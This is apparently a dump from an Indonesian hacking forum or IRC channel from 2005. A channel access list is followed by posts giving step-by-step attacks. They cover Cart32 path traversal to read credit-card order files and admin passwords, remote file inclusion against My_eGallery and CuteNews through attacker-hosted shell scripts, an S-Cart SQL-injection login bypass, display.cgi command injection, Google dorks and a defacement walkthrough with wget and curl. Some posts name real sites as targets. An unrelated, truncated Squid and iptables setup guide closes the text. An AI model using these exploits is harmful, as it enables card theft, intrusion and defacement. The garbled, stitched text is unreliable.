-ChanServ- 12 10 asLpLs 6d 3h 11m 42s

-ChanServ- 13 15 AnEuk_TeRmin4L 1d 8h 29m 53s

-ChanServ- 14 20 Viper 4d 9h 38m 44s

-ChanServ- 15 44 ToxiCity 3d 3h 24m 9s

-ChanServ- 16 10 [MICROBA] 2d 9h 21m 53s

-ChanServ- 17 14 arioo 1d 23h 26m 29s

-ChanServ- 18 45 SoniX 6h 53m 12s

-ChanServ- 19 10 mozi 3w 4d 1h 5m 39s

-ChanServ- 20 35 Chiboik 2d 2h 48m 55s

-ChanServ- 21 30 WONGEDAN 2d 14h 35m 59s

-ChanServ- 22 10 co_world 1d 9h 52m 12s

-ChanServ- 23 15 rafles 3w 1d 6h 45m 31s

-ChanServ- 24 20 gueng 4d 9h 52m 29s

-ChanServ- 25 15 H4_Kim 1h 1m 18s

-ChanServ- 26 20 djempol 3d 13h 52m 23s

-ChanServ- 27 10 maha_dewa 2d 4h 12m 40s

-ChanServ- 28 10 KuThiLaNK 1d 16m 27s

-ChanServ- 29 40 Pria 3w 10h 37m 37s

-ChanServ- 30 44 jayoes 2h 31m 18s

-ChanServ- 31 20 mikael_boloten 2d 8h 55m 50s

-ChanServ- 32 42 avantika 2w 1d 6h 38m 1s

-ChanServ- 33 40 Cybermoslem 4d 11h 25m 24s

-ChanServ- 34 25 senyum 3d 14h 47m 5s

-ChanServ- 35 44 Bamby 3d 5h 21m 46s

-ChanServ- 36 40 randyy 4d 5h 29m 45s

-ChanServ- 37 30 GeoL 3d 2h 54m 38s

-ChanServ- 38 35 skin 3h 58m 56s

-ChanServ- 39 28 padllepop 23h 42m 53s

-ChanServ- 40 48 saleho 1h 19m 17s

-ChanServ- 41 47 Kiluagank 1w 3d 11h 21m 23s

-ChanServ- 42 15 Pleky 2d 4h 11m 51s

-ChanServ- 43 10 ^YoGa^ 2w 2d 20h 46m 7s

-ChanServ- 44 50 POM_PONK 0s

-ChanServ- 45 10 ahas 8h 57m

-ChanServ- 46 49 eStI 5d 37m 6s

-ChanServ- 47 13 pingembul 2d 11h 7m 42s

-ChanServ- 48 45 garAm 4d 5h 50m 35s

-ChanServ- 49 45 OsKaDoN 2h 31m 51s

-ChanServ- 50 42 andri 23h 20m 48s

-ChanServ- 51 25 Blu3_Cyber 1d 14h 40m 29s

-ChanServ- 52 15 data_base 5w 4d 19h 27m 27s

-ChanServ- 53 48 PeNcOpEt_CiNtA 4d 23h 39m 14s

-ChanServ- 54 9 Dewa_Cinta 14h 47m 42s

-ChanServ- 55 30 RENDY_CO 6w 3d 5h 10m 35s

-ChanServ- 56 30 kethex 6w 2d 9h 52m 22s

-ChanServ- 57 15 SpY|DeR 4d 2h 31m 13s

-ChanServ- 58 35 SkyLine 1w 1d 5h 17m 58s

-ChanServ- 59 20 siti^oke

-ChanServ- 60 35 ajbtk_anton 1w 6d 8h 6m 58s

-ChanServ- 61 25 SaWeX 14w 2d 21h 24m 20s

-ChanServ- 62 15 Teguh 2w 2d 8h 29m 51s

-ChanServ- 63 15 vender 3d 14h 41m 35s

-ChanServ- 64 44 ad|fashLa 1w 8h 50m 58s

-ChanServ- 65 20 IrwansyaH 4d 14h 48m 48s

-ChanServ- 66 25 Comex 4d 5h 32m 40s

-ChanServ- 67 20 Aves 1w 1d 10h 50m 17s

-ChanServ- 68 10 Reny 3w 4d 7h 16m 19s

-ChanServ- 69 44 Malaikat^Mikhael 19h 19m 3s

-ChanServ- 70 40 BuayA 3d 12h 56m 36s

-ChanServ- 71 15 blu_smith87 1d 6h 23m 27s

-ChanServ- 72 20 ricky 11h 36m 28s

-ChanServ- 73 40 madiun 3w 5d 15h 1m 46s

-ChanServ- 74 45 solohackerlink 2w 4d 5h 5m 50s

-ChanServ- 75 20 sTeVe_YaN9_SDiKiT_ImOeT 4d 2h 32m 8s

-ChanServ- 76 15 AndyBogard 2w 2d 12h 53m 41s

-ChanServ- 77 44 cupid 19h 26m 44s

-ChanServ- 78 47 TAKESI 6s

-ChanServ- 79 20 wahyu_20 11h 15m 41s

-ChanServ- 80 20 WoNg`Edan 7h 2m 9s

-ChanServ- 81 15 GoD_Army 4d 5h 15m 12s

-ChanServ- 82 14 Pico 1d 2h 37m 59s

-ChanServ- 83 44 cOCa-cOLa 15h 20m 30s

-ChanServ- 84 20 SuPeR_MaN 9h 48m 37s

-ChanServ- -- End of list --

Cart32 v3.5a

##############################################################################

#

TUTORIAL I : Cart32 v3.5a

by : PeNcOpEt_CiNtA

Posted : 11 oktober 2005

##############################################################################

#

NB : Hanya bisa digunakan kepada beberapa situs yang memiliki kelemahan

yang sama.

Langkah 1: Dapatkan terlebih dahulu Website Cart32 v3.5a

Langkah 2: Cari di semua searc engine yang kamu ketahui.

dengan keyword " Cart32 v3.5a "

Langkah 3: Masuk ke website Cart32.exe

http://target/login/unicode/cart32.exe

(contoh : http://www.connectionsmall.com/scripts/cart32.exe/)

Langkah 4: Setelah kamu masuk kesana, akan diperlihatkan tampilan

seperti dibawah ini :

========================================

Cart32 v3.5a

Shopping Cart System for Windows

http://www.cart32.com/

Registered to Greymane ConnectionsLicense: Unlimited clients

©1996-2001 McMurtrey/Whitaker & Associates, Inc.Build 714

========================================

Langkah 4: Sekarang yang harus kamu lakukan adalah memasukkan ekstensi

berikut di akhir URL, 98% memakai #1 & #2

a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:)

b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:)

c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:)

HANYA DIGUNAKAN KADANG2!

(contoh:http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%

af../winnt/system32/cmd.exe?/c+dir+c:)

Langkah 5: Saat kamu berada di direktori utama (c:), untuk masuk ke

cc´s, masukan kembali (progra~1MWAIncCart32) ke akhir URL tadi

sehingga sekarang kamu dapat melihat seperti :

http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%

af../winnt/system32/cmd.exe?/c+dir+c:progra~1mwainccart32

Sekarang kamu dapat melihat banyak file seperti :

2814659000-001001.c32

2814659000-001002.c32

2814659000-001003.c32

Langkah 6: Copy salah satu dari nama file tersebut dan kemudian

masukkan ke akhir URL, dan akan terlihat seperti :

http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%

af../winnt/system32/cmd.exe?/c+type+c:progra~1mwainccart322814659000-001003.c32

Catatan : Diistu kamu akan melihat file lain yang berisi banyak sekali

cc´s seperti :

RONACK-orders.txt (file ini tidak berada pada situs yang khusus ini)

procure-orders.txt (file ini tidak berada pada situs yang khusus ini)

Langkah 7: Sebelum kamu mengakses tipe file yang lain, pertama kamu harus mengganti

*c+dir+c:* ke *c+type+c:*

========================================

TUTORIAL II : Cart32 v3.5a

----------------------------------------

Target: http://www.partybows.com

1. Ke http://www.partybows.com

2. Klik http://www.partybows.com/seasonal.htm

3. Isi Quantity= 1 Pokoknya kayak lu pura2x beli dan klik order

4. Maka akan kesini jadinya :

https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem

5. Ubah menjadi

https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error

Cart32 v3.5 Error

CART32 Build 619

The following internal error has occurred: Invalid procedure

Error Number = 5

Click Here For Possible Solutions

etc.

6. Cari log order-nya

Cart32 Setup Info and Directory

Mail Server = mail.axion.net Section=Main

AdminDir = D:securewebrootpartybowscgi-bincart32

Jadi partybows-orders.txt.

Sehingga akhirnya :

http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt

7. Atau untuk mendapatkan Password admin nyah loe tinggak ketik cart32.ini

https://secure.axionet.com/partybows/cgi-bin/cart32.ini

dengan tidak di sengaja kamu akan mendownload Password admin

yang ada di file cart32.ini nyah.

kamu akan mendapat kan password admin yang terencriptsi

lalu kamu coba mendecriptkan nyah dengan software

" Cart32decoder.exe "

8. Untuk mendapatkan data nama dan password clients pada Cart32

kamu bisa mencobanya dengan mengetik "CLIENT.DBF"

atau :

order file pada "ORDER atau ORDERS.DBF

========================================

TUTORIAL III : Cart32 v3.5a

----------------------------------------

search +/scripts/cart32.exe/

Exploitable Directories

-/scripts/cart32.ini

-/scripts/cart32.exe

-/scripts/cart32.exe/cart32clientlist

-/script/c32web.exe/ChangeAdminPassword

-/scripts/c32web.exe

-cgi-shl/c32web.exe/

Wherever there is the cart32.exe add this to the end of it /cart32clientlist

and erase the rest a menu will come up with a submit box click go

it will list ALL clients and their passwords passwords will be encrypted

after decrypting the password, go to wherever the [c32web.exe] file is

thats the instructions wit exploits what that channel we were just in called

-------------------------------------------------------------------------------------------------

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 08:56:21 ]

My_eGallery security exploit

##############################################

My_eGallery security exploit

Author : PeNcOpEt_CiNtA ( seng_due@yahoo.co.id )

##############################################

Bugs File may be : displayCategory.php

Display : http://www.target.com/modules/My_eGallery/public/displayCategory.php

Note :

for attacking u must use this script, save and upload to your website.

e.g save with namefile : cmd.txt

e.g from my site : http://www.geocities.com/seng_due/script/solohackerlink.txt

---------------- script from here -----------------------------------------------------


PeNcOpEt_CiNtA - WAS HERE !!!

TEST SYSTEM KEAMANAN SERVER ANDA!!!


src="http://www.geocities.com/aritrokok/aritrokok.jpg"

# saleho PHP :

# Released by : Solohackerlink-Crew




// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )

if (isset($chdir)) @chdir($chdir);

ob_start();

&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");

$output = ob_get_contents();

ob_end_clean();

", str_replace("



#SOLOHACKERLINK

------------------ End of Script ---------------------------------------------------------

###################################

Ok and now let´s Search your Target

###################################

"allinurl:displayCategory.php" or "My_eGallery"

http://www.target.com/modules/My_eGallery/public/displayCategory.php

3. test to attack with code :

?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id;

4. Display attacking :

http://www.target.com/modules/My_eGallery/public/displayCategory.php?basepath=http://ifistp.

net/cmd.txt?&cmd=uname -a;id;

5. Linux and Unix command Used in here :P~ e.g : ls -al , uname -r , cat , echo , etc....

6. So, What are U waiting For !!!

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:53:10 ]

s-cart vulnerability

##############################################

S-Cart Bugs injection

Author : PeNcOpEt_CiNtA

##############################################

/admin

Display : http://target.com/s-cart/admin

allinurl:s-cart/index.phtml or "s-cart"

http://www.target.com/s-cart/index.phtml

3. and now go to admin page with change the Url to :

auto open browser with login and passwd !!!

login : admin

passwd : ´or´´=´

4. If U are lucky, u can see the admin manager, show the table Order now or Deface s-cart page.

Ok let´s to try :P~

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:49:25 ]

display.cgi vulnerability

##############################################

Abrior´s Encore WebForum ( display.cgi )

Author : PeNcOpEt_CiNtA ( seng_due@yahoo.co.id )

Forum : #Cracked On aLL.NeT

##############################################

Bugs File : /forumcgi/display.cgi?

Display : http://www.target.com/encore/forumcgi/display.cgi?

allinurl:forumcgi/display.cgi?

http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp

3. and now go to the exploit with insert this code :

&page=anonymous&file=|uname%20-a|

4. Full Display like :

http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|

uname%20-a|

5. Linux or Unix command available in here... Good Luck :P~

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:48:30 ]

cutenews vulnerability

********************************************

PeNcOpEt_CiNtA From Solohackerlink

********************************************

bug kali ini menimpa pada cuteNews milik php dimana bug ini menimpa pada shownews.php

variabel cutepath ini sebagai eksekusi.kamu bisa menggunakan news.txt atau config.php untuk

mengetahui command dari php

oke..kita lanjut saja...

konsep hackingnya sebagai berikut:

http://target.com/cutenews/shownews.php?cutepath=http://inject.com

sekarang bagaimana kita memperoleh target tersebut???

hehehehe penasaran ya...ok..kita buka paman google, dan kasih perintah kata kunci sebagai

berikut:

inurl:cutenews/shownews.php

ntuh....banyak kan....

contohnya:

www.flip-script.com/cutenews/shownews.php

kemudian kamu ubah menjadi begini

http://www.flipscript.

com/cutenews/shownews.php?cutepath=http://geocities.com/seng_due/script/solohackerlin

k.txt?&cmd=id

hehehe dan lihat apa yang terjadi....

selanjutnya kamu bisa bereksperimen sendiri OK....

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:43:10 ]

titip file

MENITIPKAN FILE DI SITUS YANG MEMPUNYAI CELAH KEAMANAN

(orang lain mungkin menyebutnya deface)

Hehehe, aneh yah judulnya.... Padahal orang lain mungkin akan lebih suka untuk menyebutnya

sebagai deface. Sebenarnya ada sedikit perbedaan antara deface dan menitipkan file, deface

adalah mengubah tampilan suatu situs baik halaman utama atau bukan (sifatnya agak sedikit

merusak), sedangkan menitipkan file hanya meletakkan file tersendiri di suatu situs tanpa

mengubah halaman tertentu dari situs yang disusupi.

OK... saya rasa cukup basa-basinya. Kita langsung masuk ke pembahasan utama.

Ada lumayan banyak langkah yang diperlukan untuk bisa menitipkan file di suatu situs yang

mempunyai celah keamanan.

1. Pelajari command dasar sistem operasi, baik windows maupun keluarga *nix (Linux, BSD,

MacOS, SunOS, Unix, dll)

2. Cari dan pelajari bug-bug aplikasi web yang ada.

3. Pelajari cara menggunakan search engine (terutama Google).

4. Siapkan beberapa file yang mungkin akan digunakan nantinya, lalu simpan di suatu situs (kalo

gak mampu beli yaaaa.... buat situs gratisan aja)

5. Pelajari cara mencari daftar situs di suatu server (biasanya satu situs bisa terdiri dari banyak

situs, bahkan ada yang ratusan)

1. Command dasar sistem operasi

Berikut ini akan saya jelaskan beberapa command dasar dari sistem operasi, baik windows

maupun *nix yang mungkin berguna saat menyusup ke suatu sistem nantinya.

Untuk mencoba menjalankan command-command dasar tersebut, di windows gunakan DOS

prompt, sedangkan di *nix menggunakan sh, bash, bsh dan lain-lain (command line interface).

Jika anda pengguna windows dan tetap ingin mencoba command *nix bagaimana ? Coba cari

situs-situs yang menyediakan shell gratis, yang bisa dijalankan menggunakan telnet atau putty.

DOS *NIX Keterangan

dir ls Melihat daftar file di suatu direktori

ren mv Mengganti nama file

copy cp Menggandakan file

del rm Menghapus file atau direktori

mkdir mkdir Membuat direktori baru

type cat Melihat isi suatu file

cd Cd Berpindah direktori

Pwd Melihat direktori aktif

2. Bug aplikasi web

Ada beberapa jenis bug diantaranya adalah remote command execution, file injection, sql

injection.

Contoh :

Phpbb2 remote command executuon:

http://korban.com/viewtopic.php?t=1&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%

2527&cmd=id;pwd;ls ?al

Cgi remote command execution

http://korban.com/index.cgi?page=view.txt|id;pwd|

Php file injection

http://korban.com/index.php?file=http://situsmu.com/file_inject.txt?cmd=id;pwd

Asp-MsSQL Sql injection

http://korban.com/index.asp?id=1;update table set field5=?hacked? where field1=1

Untuk mendapatkan lebih banyak bug-bug aplikasi web, silakan mengunjungi situs-situs

keamanan atau situs-situs hacker yang ada.

3. Mengunakan search engine (Google)

Google adalah mesin pencari yang sangat sering digunakan oleh hacker untuk mencari situs-situs

yang mempunyai celah keamanan. Ada beberapa option yang bisa ditambahkan pada keyword

untuk mempersempit pencarian.

Allinurl:file_manager.php Я mencari situs yang ada file file_manager.php saja

Intitle:hacked Я mencari situs yang title nya ada kata hacked

Masih ada beberapa option lagi yang bisa digunakan. Option-option tersebut bisa digunakan

bersamaan agar lingkup hasil pencarian lebih sempit lagi.

Silakan membacanya langsung di google.com atau di situs-situs hacker untuk keterangan lebih

lanjut.

4. File yang mungkin dibutuhkan

Berikut ini adalah file-file yang mungkin dibutuhkan untuk melakukan penyusupan.

Phpshell

Phpshell bisa digunakan untuk exploitasi bug file injection atau di simpan di situs yang telah

berhasil di susupi untuk menjalankan command shell dari suatu sistem yang menggunakan php

sebagai bahasa pemrograman web nya

Cgitelnet

Cgi telnet hanya bisa dijalankan jika sudah tertanam di suatu situs, fungsinya sama dengan

phpshell yaitu menjalankan command shell. Untuk situs yang menggunakan Perl.

cmdAsp

sama fungsinya dengan phpshell dan cgi telnet pada situs yang menggunakan asp

5. Mencari nama dan direktori situs lain dalam satu server

Ada beberapa cara yang bisa digunakan (*nix), dengan asumsi bahwa id yang kita dapatkan

adalah apache, nobody, httpd, atau www. Jika id yang kita dapatkan adalah nama user maka

selamat... kita bisa deface halaman utama.

a. httpd.conf

Cari file httpd.conf, dengan menjalankan perintah locate httpd.conf.

Misalkan hasilnya /etc/httpd/httpd.conf, lihat isinya dengan perintah cat /etc/httpd/httpd.conf

Jika kita beruntung maka dalam file tersebut terdapat daftar nama situs berikut direktori root nya.

Jika tidak ada, gunakan cara lain.

b. /etc/passwd

Kita bisa menggunakan file /etc/passwd untuk meraba keberadaan direktori situs

Caranya, jalankan perintah pwd, misalkan hasilnya /home/telo/public_html

Selanjutnya lihat isi file /etc/passwd dengan command cat /etc/passwd

Lihat isinya, perhatikan semua daftar user yang mengandung kata /home

Misalnya /home/user1, /home/user2

Dari sini kita hanya mendapatkan direktori root dari suatu situs, tetapi belum mengetahui nama

situsnya.

Lalu bagaimana cara untuk mengetahui? Cara manual, yaitu dengan melihat-lihat isi dari file-file

yg ada di dirrektori situs tersebut, misalkan cd /home/user1/public_html;cat index.html, cara ini

memerlukan sedikit kesabaran J

c. /home

misal hasil pwd /home/telo/public_html.

Jalankan perintah ls /home untuk melihat isi dari direktori /home

Jika ada hsailnya berarti kita cukup beruntung karena kabanyakan server tidak mengijinkan

nobody untuk melihat isi direktori tersebut.

Selanjutnya hampir sama dengan bagian b di atas, cara ini juga mirip jika kita mendapatkan hasil

pwd seperti /etc/www/vhost/teloganyong.com/httpdocs.

OK, sementara cukup perkenalannya, sekarang kita coba langsung ke kasus yang mendekati

nyata.

Sebagai gambaran, saya lebih suka jika mendapatkan bug php file injection, maka bug ini

sebagai contoh J

http://korban.com/index.php?file=http://situsmu.com/inject.txt? (jangan lupa karakter tanda tanya)

(saya anggap file inject.txt nya berupa satu textbox dan satu tombol submit)

1. Masukkan perintah id;pwd;ls ?al

2. perhatikan hasilnya, selanjutnya kita anggap hasilnya id=nobody,

pwd=/home/korban/public_html, dan hasil ls ?al tidak perlu disebutkan.

3. Cari tempat dimana kita diberi ijin menulis, caranya dengan menjalankan perintah

find /home/korban/public_html ?perm 777 -type d

4. Jika ada daftar direktori yang muncul dari perintah no 3, berarti kita bisa menulis

5. Misalkan hasilnya /home/korban/public_html/images

6. Masukkan file yang ingin ditanamkan dengan cara menjalankan perintah

cd /home/korban/public_html/images;wget http://situsmu.com/deface.html;ls (misalnya), perintah

ls digunakan untuk memeriksa apakah file berhasil di susupkan

7. Jika berhasil maka kita bisa mengakses file tersebut ke http://korban.com/images/deface.html

8. selesai

catatan: untuk perintah memasukkan file, mungkin saja wget tidak ada atau memerlukan option

tambahan, silakan mencoba cara lain berikut ini

wget http://situsmu.com/deface.html

wget ?o deface.html http://situsmu.com/deface.html

curl ?o deface html http://situsmu.com/deface.html

lwp-download http://situsmu.com/deface.html

fetch http://situsmu.com/deface.html

linx http://situsmu.com/deface.html

jika masih tidak berhasil juga silakan menggunakan perintah echo untuk menulis file secara

langsung

telo.html;ls

http://korban.com/images/telo.html

Post by : x`shell on [ 10 November 2005 17:43:02 ]

Installasi Squid + Compile Kernel + HTB + IPTABLES

Installasi Squid + Compile Kernel + HTB + IPTABLES

==================================================

Konfigurasi ini ditujukan pada Madya (c3p0t) dan Dana (suheng) Warnet Citra Pangkalpinang dan

Warnet Speednet Pangkalpinang.

Download Source Squid :

wget -c http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE7.tar.bz2

Ekstrak Source Squid :

tar -jxf squid-2.5.STABLE7.tar.bz2

Configure Squid :

cd squid-2.5.STABLE7

pastikan paket glibc terinstall di sistem:

installpkg /mnt/cdrom/slackware/l/glibc*.tgz

./configure --prefix=/usr/local/squid

--exec-prefix=/usr/local/squid

--enable-delay-pools --enable-cache-diggests

--disable-ident-lookups --enable-async-io=16

--enable-removal-policies="lru,heap"

--enable-poll --enable-linux-netfilter

Installasi Squid:

make

make install

File squid.conf standard :

##########################

http_port 3128

icp_port 3130

hierarchy_stoplist cgi-bin ?

acl QUERY urlpath_regex cgi-bin ?

no_cache deny QUERY

cache_mem 8 MB

cache_swap_low 90

cache_swap_high 95

cache_replacement_policy lru

cache_dir ufs /usr/local/squid/var/cache 1000 16 256

cache_access_log /usr/local/squid/var/logs/access.log

cache_log /usr/local/squid/var/logs/cache.log

cache_store_log none

mime_table /usr/local/squid/etc/mime.conf

pid_filename /usr/local/squid/var/logs/squid.pid

debug_options ALL,1

ftp_user Squid@

ftp_list_width 32

ftp_passive on

dns_nameservers 127.0.0.1

refresh_pattern ^ftp: 1440 20% 10080

refresh_pattern ^gopher: 1440 0% 1440

refresh_pattern . 0 20% 4320

acl all src 0.0.0.0/0.0.0.0

acl manager proto cache_object

acl localhost src 127.0.0.1/255.255.255.255

acl to_localhost dst 127.0.0.0/8

acl SSL_ports port 443 563 8443

acl Safe_ports port 80 # http

acl Safe_ports port 21 # ftp

acl Safe_ports port 443 563 # https, snews

acl Safe_ports port 70 # gopher

acl Safe_ports port 210 # wais

acl Safe_ports port 1025-65535 # unregistered ports

acl Safe_ports port 280 # http-mgmt

acl Safe_ports port 488 # gss-http

acl Safe_ports port 591 # filemaker

acl Safe_ports port 777 # multiling http

acl CONNECT method CONNECT

http_access allow manager localhost

http_access deny manager

http_access deny !Safe_ports

http_access deny CONNECT !SSL_ports

acl our_networks src 192.168.1.0/24

http_access allow our_networks

acl IIX dst_as 7713 4795 7597 4622 4787 4800

always_direct allow IIX

http_access deny all

cache_mgr webmaster

cache_effective_user squid

cache_effective_group squid

visible_hostname warnet.citra.com

httpd_accel_host virtual

httpd_accel_port 80

httpd_accel_with_proxy on

httpd_accel_uses_host_header on

################################

configurasi lainnya bisa di baca di squid.conf.default

Menjalankan squid pertama kali:

groupadd -g 8080 squid

useradd -g 8080 -u 8080 -s /bin/false -d /usr/local/squid squid

mengecek kesalahan config:

/usr/local/squid/sbin/squid -k parse

membuat directory cache:

/usr/local/squid/sbin/squid -z

Menjalankan squid :

/usr/local/squid/sbin/squid -DY

(masukkan juga di rc.local)

Compile Kernel :

================

Compile kernel digunakan untuk optimasi kernel dikemudian hari. disini kita menambahkan option

QoS untuk fasilitas bandwitdh limiter. pastikan packet Ncurse sudah terinstall

installpkg /mnt/cdrom/slackware/l/ncurse*.tgz

cd /usr/src/linux

make menuconfig

¦ ¦ [*] QoS and/or fair queueing ¦ ¦

¦ ¦ CBQ packet scheduler ¦ ¦

¦ ¦ HTB packet scheduler ¦ ¦

¦ ¦ CSZ packet scheduler ¦ ¦

¦ ¦ The simplest PRIO pseudoscheduler ¦ ¦

¦ ¦ RED queue ¦ ¦

¦ ¦ SFQ queue ¦ ¦

¦ ¦ TEQL queue ¦ ¦

¦ ¦ TBF queue ¦ ¦

¦ ¦ GRED queue ¦ ¦

¦ ¦ Diffserv field marker ¦ ¦

¦ ¦ Ingress Qdisc ¦ ¦

¦ ¦ [*] QoS support ¦ ¦

¦ ¦ [*] Rate estimator ¦ ¦

¦ ¦ [*] Packet classifier API ¦ ¦

¦ ¦ TC index classifier ¦ ¦

¦ ¦ Routing table based classifier ¦ ¦

¦ ¦ Firewall based classifier ¦ ¦

¦ ¦ U32 classifier ¦ ¦

¦ ¦ Special RSVP classifier ¦ ¦

¦ ¦ Special RSVP classifier for IPv6 ¦ ¦

¦ ¦ [*] Traffic policing (needed for in/egress) ¦ ¦

keluar (exit) dan simpan configurasi diatas

make dep

make clean

make modules

make modules_install

make bzImage

Configurasi Bootloader

cp System.map /boot/System.map-qos

cp arch/i386/boot/bzImage /boot/vmlinuz-qos

pico /etc/lilo.conf

###########################

# Start LILO global section

boot = /dev/hda

message = /boot/boot_message.txt

prompt

timeout = 1200

# Override dangerous defaults that rewrite the partition table:

change-rules

reset

# Normal VGA console

vga = normal

# Linux bootable partition config begins

image = /boot/vmlinuz-qos

root = /dev/hda2

label = Linux-QOS

read-only

# Linux bootable partition config ends

# Linux bootable partition config begins

image = /boot/vmlinuz

root = /dev/hda2

label = Linux

read-only

# Linux bootable partition config ends

##############################

reboot

HTB Bandwitdh Managemen

=======================

Dalam percobaan ini ada 3 buah komputer.

Total Bandwith Internet downlink 64 Kbps dan upstrime tidak dibatasi

komputer 1 bernama madya dengan ip 192.168.1.2, akan di beri jatah downlink 32 Kbps

komputer 2 bernama dana dengan ip 192.168.1.3, akan di beri jatah downlink 16Kbps

komputer 3 bernama dion dengan ip 192.168.1.4, akan di beri jatah downlink 16Kbps

download HTB.INIT

wget http://aleron.dl.sourceforge.net/sourceforge/htbinit/htb.init-v0.8.5

cp htb.init-v0.8.5 /usr/sbin/htb.init

chmod 755 /usr/sbin/htb.init

membuat direktory htb

mkdir -p /etc/sysconfig/htb

pico /etc/sysconfig/htb/eth0

R2Q=1

pico /etc/sysconfig/htb/eth0-10.root

RATE=64Kbit

QUANTUM=1500

pico /etc/sysconfig/htb/eth0-10:1.madya

RATE=32Kbit

QUANTUM=1500

CEIL=64Kbit

LEAF=sfq

RULE=192.168.1.2/32,

pico /etc/sysconfig/htb/eth0-10:2.dana

RATE=16Kbit

QUANTUM=1500

CEIL=64Kbit

LEAF=sfq

RULE=192.168.1.3/32,

pico /etc/sysconfig/htb/eth0-10:3.dion

RATE=16Kbit

QUANTUM=1500

CEIL=64Kbit

LEAF=sfq

RULE=192.168.1.4/32,

Install iproute2 dari src.teras.net.id

installpkg http://src.teras.net.id/slack-pkg/iproute2-2.4.7_now_ss020116_try-i386-4.tgz

download pacth tc dari docum.org

wget http://www.docum.org/docum.org/download/tc.bz2

ekstrak tc dan copy ke /sbin/

bunzip2 tc.bz2

cp tc /sbin/

chmod 755 /sbin/tc

Compile htb.init

htb.init compile

Start htb.init

htb.init start

Jika tidak ada eror berarti anda selesai menginstall htb bandwitdh limiter, jangan lupa htb.init start

dimasukkan kedalam rc.local

IPTABLES

========

##############################################################################

###

# perintah menjalankan scripts: firewall (start|stop|restart|status) EXTIF INTIF

# contoh: "firewall start ppp0 eth0"

##############################################################################

###

#!/bin/sh

IPTABLES="/usr/sbin/iptables"

case "$1" in

stop)

echo "firewall dimatikan..!!!"

$IPTABLES -F

$IPTABLES -F -t mangle

$IPTABLES -F -t nat

$IPTABLES -X

$IPTABLES -X -t mangle

$IPTABLES -X -t nat

$IPTABLES -P INPUT ACCEPT

$IPTABLES -P OUTPUT ACCEPT

$IPTABLES -P FORWARD ACCEPT

echo "...done"

;;

status)

echo $"Table: filter"

iptables --list

echo $"Table: nat"

iptables -t nat --list

echo $"Table: mangle"

iptables -t mangle --list

;;

restart|reload)

$0 stop

$0 start

;;

start)

echo "Benteng Firewall diaktifkan"

echo ""

DEFAULT_EXTIF="ppp0"

DEFAULT_INTIF="eth0"

UNIVERSE="0.0.0.0/0"

UNPRIVPORTS="1024:65535"

XWINPORTS="6000:6063"

IRCPORTS="6665,6666,6667,6668,6669,7000"

#-----Port-Forwarding Variables-----#

#For port-forwarding to an internal host, define a variable with the appropriate

#internal IP-Address here and take a look at the port-forwarding sections in the FORWARD +

#PREROUTING-chain:

#These are examples, uncomment to activate

#IP for forwarded Battlecom-traffic

#BATTLECOMIP="192.168.0.5"

#IP for forwarded HTTP-traffic

#HTTPIP="192.168.0.20"

#----Flood Variables-----#

# Overall Limit for TCP-SYN-Flood detection

TCPSYNLIMIT="5/s"

# Burst Limit for TCP-SYN-Flood detection

TCPSYNLIMITBURST="10"

# Overall Limit for Loggging in Logging-Chains

LOGLIMIT="2/s"

# Burst Limit for Logging in Logging-Chains

LOGLIMITBURST="10"

# Overall Limit for Ping-Flood-Detection

PINGLIMIT="5/s"

# Burst Limit for Ping-Flood-Detection

PINGLIMITBURST="10"

#----Automatically determine infos about involved interfaces-----#

### External Interface:

## Get external interface from command-line

## If no interface is specified then set $DEFAULT_EXTIF as EXTIF

if [ "x$2" != "x" ]; then

EXTIF=$2

else

EXTIF=$DEFAULT_EXTIF

fi

echo External Interface: $EXTIF

## Determine external IP

EXTIP="`ifconfig $EXTIF | grep inet | cut -d : -f 2 | cut -d -f 1`"

if [ "$EXTIP" = ´´ ]; then

echo "Aborting: Unable to determine the IP-address of $EXTIF !"

exit 1

fi

echo External IP: $EXTIP

## Determine external gateway

EXTGW=`route -n | grep -A 4 UG | awk ´{ print $2}´`

echo Default GW: $EXTGW

echo " --- "

### Internal Interface:

## Get internal interface from command-line

## If no interface is specified then set $DEFAULT_INTIF as INTIF

if [ "x$3" != "x" ]; then

INTIF=$3

else

INTIF=$DEFAULT_INTIF

fi

echo Internal Interface: $INTIF

## Determine internal IP

INTIP="`ifconfig $INTIF | grep inet | cut -d : -f 2 | cut -d -f 1`"

if [ "$INTIP" = ´´ ]; then

echo "Aborting: Unable to determine the IP-address of $INTIF !"

exit 1

fi

echo Internal IP: $INTIP

## Determine internal netmask

INTMASK="`ifconfig $INTIF | grep Mask | cut -d : -f 4`"

echo Internal Netmask: $INTMASK

## Determine network address of the internal network

INTLAN=$INTIP´/´$INTMASK

echo Internal LAN: $INTLAN

echo ""

#----Load IPTABLES-modules-----#

#Insert modules- should be done automatically if needed

#If the IRC-modules are available, uncomment them below

echo "Loading IPTABLES modules"

dmesg -n 1 #Kill copyright display on module load

/sbin/modprobe ip_tables

/sbin/modprobe iptable_filter

/sbin/modprobe ip_conntrack

/sbin/modprobe ip_conntrack_ftp

/sbin/modprobe ip_nat_ftp

#/sbin/modprobe ip_conntrack_irc ports=$IRCPORTS

#/sbin/modprobe ip_nat_irc ports=$IRCPORTS

dmesg -n 6

echo " --- "

#----Clear/Reset all chains-----#

#Clear all IPTABLES-chains

#Flush everything, start from scratch

